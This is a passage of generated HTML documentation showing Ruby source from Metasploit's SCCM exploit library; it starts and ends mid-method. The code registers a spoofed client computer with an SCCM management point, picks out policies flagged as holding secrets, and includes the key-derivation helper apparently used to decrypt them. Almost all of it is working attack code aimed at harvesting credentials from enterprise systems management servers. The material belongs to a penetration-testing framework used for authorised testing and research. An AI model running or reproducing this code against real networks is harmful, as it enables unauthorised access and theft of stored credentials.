<span class='id identifier rubyid_compressed_response'>compressed_response</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_zlib_inflate'>zlib_inflate</span><span class='lparen'>(</span><span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_parts'>parts</span><span class='lbracket'>[</span><span class='int'>1</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_content'>content</span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_force_encoding'>force_encoding</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-16le</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_xml_doc'>xml_doc</span> <span class='op'>=</span> <span class='const'>Nokogiri</span><span class='op'>::</span><span class='const'>XML</span><span class='lparen'>(</span><span class='id identifier rubyid_compressed_response'>compressed_response</span><span class='period'>.</span><span class='id identifier rubyid_encode'>encode</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-8</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_policies'>policies</span> <span class='op'>=</span> <span class='id identifier rubyid_xml_doc'>xml_doc</span><span class='period'>.</span><span class='id identifier rubyid_xpath'>xpath</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>//Policy</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_secret_policies'>secret_policies</span> <span class='op'>=</span> <span class='id identifier rubyid_policies'>policies</span><span class='period'>.</span><span class='id identifier rubyid_select'>select</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_policy'>policy</span><span class='op'>|</span>
<span class='id identifier rubyid_flags'>flags</span> <span class='op'>=</span> <span class='id identifier rubyid_policy'>policy</span><span class='period'>.</span><span class='id identifier rubyid_attributes'>attributes</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>PolicyFlags</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='kw'>next</span> <span class='kw'>if</span> <span class='id identifier rubyid_flags'>flags</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_flags'>flags</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span><span class='period'>.</span><span class='id identifier rubyid_to_i'>to_i</span> <span class='op'>&amp;</span> <span class='const'><span class='object_link'><a href="#SECRET_POLICY_FLAG-constant" title="Msf::Exploit::Remote::HTTP::SCCM::SECRET_POLICY_FLAG (constant)">SECRET_POLICY_FLAG</a></span></span> <span class='op'>==</span> <span class='const'><span class='object_link'><a href="#SECRET_POLICY_FLAG-constant" title="Msf::Exploit::Remote::HTTP::SCCM::SECRET_POLICY_FLAG (constant)">SECRET_POLICY_FLAG</a></span></span>
<span class='kw'>end</span>
<span class='id identifier rubyid_urls'>urls</span> <span class='op'>=</span> <span class='id identifier rubyid_secret_policies'>secret_policies</span><span class='period'>.</span><span class='id identifier rubyid_map'>map</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_policy'>policy</span><span class='op'>|</span>
<span class='id identifier rubyid_policy'>policy</span><span class='period'>.</span><span class='id identifier rubyid_xpath'>xpath</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>PolicyLocation/text()</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_text'>text</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_urls'>urls</span> <span class='op'>=</span> <span class='id identifier rubyid_urls'>urls</span><span class='period'>.</span><span class='id identifier rubyid_reject'>reject</span><span class='lparen'>(</span><span class='op'>&amp;</span><span class='symbol'>:blank?</span><span class='rparen'>)</span>
<span class='id identifier rubyid_urls'>urls</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_url'>url</span><span class='op'>|</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Found policy containing secrets: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_url'>url</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_urls'>urls</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="make_ms_pubkey-instance_method">
#<strong>make_ms_pubkey</strong>(pub_key) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Make a pubkey structure (<a href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqqb/ade9efde-3ec8-4e47-9ae9-34b64d8081bb">learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqqb/ade9efde-3ec8-4e47-9ae9-34b64d8081bb</a>)</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
260
261
262
263
264
265
266</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/sccm.rb', line 260</span>
<span class='kw'>def</span> <span class='id identifier rubyid_make_ms_pubkey'>make_ms_pubkey</span><span class='lparen'>(</span><span class='id identifier rubyid_pub_key'>pub_key</span><span class='rparen'>)</span>
<span class='id identifier rubyid_result'>result</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x06\x02\x00\x00\x00\xA4\x00\x00\x52\x53\x41\x31</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_result'>result</span> <span class='op'>+=</span> <span class='lbracket'>[</span><span class='const'><span class='object_link'><a href="#KEY_SIZE-constant" title="Msf::Exploit::Remote::HTTP::SCCM::KEY_SIZE (constant)">KEY_SIZE</a></span></span><span class='comma'>,</span> <span class='id identifier rubyid_pub_key'>pub_key</span><span class='period'>.</span><span class='id identifier rubyid_e'>e</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_pack'>pack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>II</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_result'>result</span> <span class='op'>+=</span> <span class='lbracket'>[</span><span class='id identifier rubyid_pub_key'>pub_key</span><span class='period'>.</span><span class='id identifier rubyid_n'>n</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='lparen'>(</span><span class='int'>16</span><span class='rparen'>)</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_pack'>pack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>H*</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_result'>result</span><span class='period'>.</span><span class='id identifier rubyid_unpack'>unpack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>H*</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="mscrypt_derive_key_sha1-instance_method">
#<strong>mscrypt_derive_key_sha1</strong>(secret) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/sccm.rb', line 305</span>
<span class='kw'>def</span> <span class='id identifier rubyid_mscrypt_derive_key_sha1'>mscrypt_derive_key_sha1</span><span class='lparen'>(</span><span class='id identifier rubyid_secret'>secret</span><span class='rparen'>)</span>
<span class='id identifier rubyid_buf1'>buf1</span> <span class='op'>=</span> <span class='lbracket'>[</span><span class='int'>0x36</span><span class='rbracket'>]</span> <span class='op'>*</span> <span class='int'>64</span>
<span class='id identifier rubyid_buf2'>buf2</span> <span class='op'>=</span> <span class='lbracket'>[</span><span class='int'>0x5C</span><span class='rbracket'>]</span> <span class='op'>*</span> <span class='int'>64</span>
<span class='id identifier rubyid_digest'>digest</span> <span class='op'>=</span> <span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>Digest</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SHA1</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_hash'>hash</span> <span class='op'>=</span> <span class='id identifier rubyid_digest'>digest</span><span class='period'>.</span><span class='id identifier rubyid_digest'>digest</span><span class='lparen'>(</span><span class='id identifier rubyid_secret'>secret</span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_bytes'>bytes</span>
<span class='id identifier rubyid_hash'>hash</span><span class='period'>.</span><span class='id identifier rubyid_each_with_index'>each_with_index</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_byte'>byte</span><span class='comma'>,</span> <span class='id identifier rubyid_i'>i</span><span class='op'>|</span>
<span class='id identifier rubyid_buf1'>buf1</span><span class='lbracket'>[</span><span class='id identifier rubyid_i'>i</span><span class='rbracket'>]</span> <span class='op'>^=</span> <span class='id identifier rubyid_byte'>byte</span>
<span class='id identifier rubyid_buf2'>buf2</span><span class='lbracket'>[</span><span class='id identifier rubyid_i'>i</span><span class='rbracket'>]</span> <span class='op'>^=</span> <span class='id identifier rubyid_byte'>byte</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_buf1'>buf1</span> <span class='op'>=</span> <span class='id identifier rubyid_buf1'>buf1</span><span class='period'>.</span><span class='id identifier rubyid_pack'>pack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>C*</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_buf2'>buf2</span> <span class='op'>=</span> <span class='id identifier rubyid_buf2'>buf2</span><span class='period'>.</span><span class='id identifier rubyid_pack'>pack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>C*</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_digest'>digest</span> <span class='op'>=</span> <span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>Digest</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SHA1</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_hash1'>hash1</span> <span class='op'>=</span> <span class='id identifier rubyid_digest'>digest</span><span class='period'>.</span><span class='id identifier rubyid_digest'>digest</span><span class='lparen'>(</span><span class='id identifier rubyid_buf1'>buf1</span><span class='rparen'>)</span>
<span class='id identifier rubyid_digest'>digest</span> <span class='op'>=</span> <span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>Digest</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SHA1</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_hash2'>hash2</span> <span class='op'>=</span> <span class='id identifier rubyid_digest'>digest</span><span class='period'>.</span><span class='id identifier rubyid_digest'>digest</span><span class='lparen'>(</span><span class='id identifier rubyid_buf2'>buf2</span><span class='rparen'>)</span>
<span class='id identifier rubyid_hash1'>hash1</span> <span class='op'>+</span> <span class='id identifier rubyid_hash2'>hash2</span><span class='lbracket'>[</span><span class='int'>0</span><span class='op'>..</span><span class='int'>3</span><span class='rbracket'>]</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="register_request-instance_method">
#<strong>register_request</strong>(http_opts, management_point, key, cert, computer_user) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Make a request to the SCCM server to register our computer</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/sccm.rb', line 113</span>
<span class='kw'>def</span> <span class='id identifier rubyid_register_request'>register_request</span><span class='lparen'>(</span><span class='id identifier rubyid_http_opts'>http_opts</span><span class='comma'>,</span> <span class='id identifier rubyid_management_point'>management_point</span><span class='comma'>,</span> <span class='id identifier rubyid_key'>key</span><span class='comma'>,</span> <span class='id identifier rubyid_cert'>cert</span><span class='comma'>,</span> <span class='id identifier rubyid_computer_user'>computer_user</span><span class='rparen'>)</span>
<span class='id identifier rubyid_pub_key'>pub_key</span> <span class='op'>=</span> <span class='id identifier rubyid_cert'>cert</span><span class='period'>.</span><span class='id identifier rubyid_to_der'>to_der</span><span class='period'>.</span><span class='id identifier rubyid_unpack'>unpack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>H*</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_upcase'>upcase</span>
<span class='id identifier rubyid_fqdn'>fqdn</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_computer_user'>computer_user</span><span class='embexpr_end'>}</span><span class='tstring_content'>.</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>DOMAIN</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_sent_time'>sent_time</span> <span class='op'>=</span> <span class='const'>Time</span><span class='period'>.</span><span class='id identifier rubyid_now'>now</span><span class='period'>.</span><span class='id identifier rubyid_utc'>utc</span><span class='period'>.</span><span class='id identifier rubyid_iso8601'>iso8601</span>
<span class='id identifier rubyid_registration_request_data'>registration_request_data</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&lt;Data HashAlgorithm=\&quot;1.2.840.113549.1.1.11\&quot; SMSID=\&quot;\&quot; RequestType=\&quot;Registration\&quot; TimeStamp=\&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_sent_time'>sent_time</span><span class='embexpr_end'>}</span><span class='tstring_content'>\&quot;&gt;&lt;AgentInformation AgentIdentity=\&quot;CCMSetup.exe\&quot; AgentVersion=\&quot;5.00.8325.0000\&quot; AgentType=\&quot;0\&quot; /&gt;&lt;Certificates&gt;&lt;Encryption Encoding=\&quot;HexBinary\&quot; KeyType=\&quot;1\&quot;&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_pub_key'>pub_key</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/Encryption&gt;&lt;Signing Encoding=\&quot;HexBinary\&quot; KeyType=\&quot;1\&quot;&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_pub_key'>pub_key</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/Signing&gt;&lt;/Certificates&gt;&lt;DiscoveryProperties&gt;&lt;Property Name=\&quot;Netbios Name\&quot; Value=\&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_computer_user'>computer_user</span><span class='embexpr_end'>}</span><span class='tstring_content'>\&quot; /&gt;&lt;Property Name=\&quot;FQ Name\&quot; Value=\&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_fqdn'>fqdn</span><span class='embexpr_end'>}</span><span class='tstring_content'>\&quot; /&gt;&lt;Property Name=\&quot;Locale ID\&quot; Value=\&quot;1033\&quot; /&gt;&lt;Property Name=\&quot;InternetFlag\&quot; Value=\&quot;0\&quot; /&gt;&lt;/DiscoveryProperties&gt;&lt;/Data&gt;</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_signature'>signature</span> <span class='op'>=</span> <span class='id identifier rubyid_rsa_sign'>rsa_sign</span><span class='lparen'>(</span><span class='id identifier rubyid_key'>key</span><span class='comma'>,</span> <span class='id identifier rubyid_registration_request_data'>registration_request_data</span><span class='period'>.</span><span class='id identifier rubyid_encode'>encode</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-16le</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_registration_request'>registration_request</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&lt;ClientRegistrationRequest&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_registration_request_data'>registration_request_data</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;Signature&gt;&lt;SignatureValue&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_signature'>signature</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/SignatureValue&gt;&lt;/Signature&gt;&lt;/ClientRegistrationRequest&gt;\x00</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_rr_utf16'>rr_utf16</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_rr_utf16'>rr_utf16</span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_registration_request'>registration_request</span><span class='period'>.</span><span class='id identifier rubyid_encode'>encode</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-16le</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_bytes'>bytes</span><span class='period'>.</span><span class='id identifier rubyid_pack'>pack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>C*</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_body_length'>body_length</span> <span class='op'>=</span> <span class='id identifier rubyid_rr_utf16'>rr_utf16</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span>
<span class='id identifier rubyid_rr_utf16'>rr_utf16</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\r\n</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_header'>header</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&lt;Msg ReplyCompression=\&quot;zlib\&quot; SchemaVersion=\&quot;1.1\&quot;&gt;&lt;Body Type=\&quot;ByteRange\&quot; Length=\&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_body_length'>body_length</span><span class='embexpr_end'>}</span><span class='tstring_content'>\&quot; Offset=\&quot;0\&quot; /&gt;&lt;CorrelationID&gt;{00000000-0000-0000-0000-000000000000}&lt;/CorrelationID&gt;&lt;Hooks&gt;&lt;Hook3 Name=\&quot;zlib-compress\&quot; /&gt;&lt;/Hooks&gt;&lt;ID&gt;{5DD100CD-DF1D-45F5-BA17-A327F43465F8}&lt;/ID&gt;&lt;Payload Type=\&quot;inline\&quot; /&gt;&lt;Priority&gt;0&lt;/Priority&gt;&lt;Protocol&gt;http&lt;/Protocol&gt;&lt;ReplyMode&gt;Sync&lt;/ReplyMode&gt;&lt;ReplyTo&gt;direct:</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_computer_user'>computer_user</span><span class='embexpr_end'>}</span><span class='tstring_content'>:SccmMessaging&lt;/ReplyTo&gt;&lt;SentTime&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_sent_time'>sent_time</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/SentTime&gt;&lt;SourceHost&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_computer_user'>computer_user</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/SourceHost&gt;&lt;TargetAddress&gt;mp:MP_ClientRegistration&lt;/TargetAddress&gt;&lt;TargetEndpoint&gt;MP_ClientRegistration&lt;/TargetEndpoint&gt;&lt;TargetHost&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_management_point'>management_point</span><span class='period'>.</span><span class='id identifier rubyid_downcase'>downcase</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/TargetHost&gt;&lt;Timeout&gt;60000&lt;/Timeout&gt;&lt;/Msg&gt;</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_message'>message</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>MIME</span><span class='op'>::</span><span class='const'>Message</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span>
<span class='id identifier rubyid_message'>message</span><span class='period'>.</span><span class='id identifier rubyid_bound'>bound</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>aAbBcCdDv1234567890VxXyYzZ</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_message'>message</span><span class='period'>.</span><span class='id identifier rubyid_add_part'>add_part</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\ufeff</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_header'>header</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='period'>.</span><span class='id identifier rubyid_encode'>encode</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-16le</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_bytes'>bytes</span><span class='period'>.</span><span class='id identifier rubyid_pack'>pack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>C*</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>text/plain; charset=UTF-16</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='kw'>nil</span><span class='rparen'>)</span>
<span class='id identifier rubyid_message'>message</span><span class='period'>.</span><span class='id identifier rubyid_add_part'>add_part</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_zlib_deflate'>zlib_deflate</span><span class='lparen'>(</span><span class='id identifier rubyid_rr_utf16'>rr_utf16</span><span class='rparen'>)</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>application/octet-stream</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>binary</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_opts'>opts</span> <span class='op'>=</span> <span class='id identifier rubyid_http_opts'>http_opts</span><span class='period'>.</span><span class='id identifier rubyid_merge'>merge</span><span class='lparen'>(</span><span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>uri</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>/ccm_system_windowsauth/request</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>method</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>CCM_POST</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>data</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_message'>message</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span>
<span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>headers</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>headers</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_merge'>merge</span><span class='lparen'>(</span><span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Content-Type</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>multipart/mixed; boundary=&quot;aAbBcCdDv1234567890VxXyYzZ&quot;</span><span class='tstring_end'>&#39;</span></span>
<span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='id identifier rubyid_http_response'>http_response</span> <span class='op'>=</span> <span class='id identifier rubyid_send_request_raw'>send_request_raw</span><span class='lparen'>(</span><span class='id identifier rubyid_opts'>opts</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_http_response'>http_response</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_fail_with'>fail_with</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html" title="Msf::Module::Failure (module)">Failure</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html#Unreachable-constant" title="Msf::Module::Failure::Unreachable (constant)">Unreachable</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>No response from server</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_ip_address'>ip_address</span> <span class='op'>=</span> <span class='id identifier rubyid_http_response'>http_response</span><span class='period'>.</span><span class='id identifier rubyid_peerinfo'>peerinfo</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>addr</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_response'>response</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>MIME</span><span class='op'>::</span><span class='const'>Message</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='id identifier rubyid_http_response'>http_response</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_parts'>parts</span><span class='period'>.</span><span class='id identifier rubyid_empty?'>empty?</span>
<span class='id identifier rubyid_html_doc'>html_doc</span> <span class='op'>=</span> <span class='const'>Nokogiri</span><span class='op'>::</span><span class='const'>HTML</span><span class='lparen'>(</span><span class='id identifier rubyid_http_response'>http_response</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='rparen'>)</span>
<span class='id identifier rubyid_error'>error</span> <span class='op'>=</span> <span class='id identifier rubyid_html_doc'>html_doc</span><span class='period'>.</span><span class='id identifier rubyid_xpath'>xpath</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>//title</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_text'>text</span>
<span class='kw'>if</span> <span class='id identifier rubyid_error'>error</span><span class='period'>.</span><span class='id identifier rubyid_blank?'>blank?</span>
<span class='id identifier rubyid_error'>error</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Bad response from server</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_dlog'><span class='object_link'><a href="../../../../top-level-namespace.html#dlog-instance_method" title="#dlog (method)">dlog</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Response from server:</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
